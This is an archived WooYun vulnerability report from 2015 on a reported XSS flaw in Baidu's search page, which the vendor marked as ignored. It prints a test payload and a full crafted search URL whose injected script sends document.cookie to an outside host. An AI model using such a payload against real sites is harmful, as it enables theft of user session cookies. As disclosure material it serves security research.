当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113878

漏洞标题:百度首页存在XSS漏洞可以窃取用户cookie纪录到远程服务器

相关厂商:百度

漏洞作者: 路人甲

提交时间:2015-05-13 16:26

修复时间:2015-05-13 19:19

公开时间:2015-05-13 19:19

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-13: 细节已通知厂商并且等待厂商处理中
2015-05-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

如题........

详细说明:

问题出现在百度首页上
当提交site:<script>/**/alert(document.cookie)//
出现了xss,弹出cookie

QQ截图20150513130556.png


payload

http://www.baidu.com/s?ie=utf-8&mod=1&isbd=1&isid=497CC997CB862190&ie=utf-8&f=8&rsv_bp=1&tn=monline_5_dg&wd=site%3A<script%2Fxx>%2F**%2Fwindow.open(`http%3A%2F%2F0.37k.org%2F%3F`%2Bdocument.cookie)%2F%2F&rsv_pq=90f9168d0002791e&rsv_t=7852rbLbUY9f3gGNKV4wzkptzkOB6xQ%2BcZ3CCpJrwanWSUhI7Ko3ufQ6I6eKPnIo4tJx&rsv_enter=0&rsv_sug3=4&inputT=2265&rsv_sug4=3072&bs=site%3A<script>%2F**%2Fwindow.open(`http%3A%2F%2F037.org%2F%3F`%2Bdocument.cookie)%2F%2F&rsv_sid=undefined&_ss=1&clist=&hsug=&f4s=1&csor=15&_cr1=39555


成功获得cookie

QQ截图20150513130958.png


就不深入了.......

漏洞证明:

QQ截图20150513130556.png


QQ截图20150513130958.png

修复方案:

过滤掉.......

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-13 19:19

厂商回复:

已发过好几遍了

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-13 16:56 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    卧槽,这个叼。

  2. 2015-05-14 11:28 | 小猪。 ( 路人 | Rank:6 漏洞数:3 | 小猪。)

    求原理!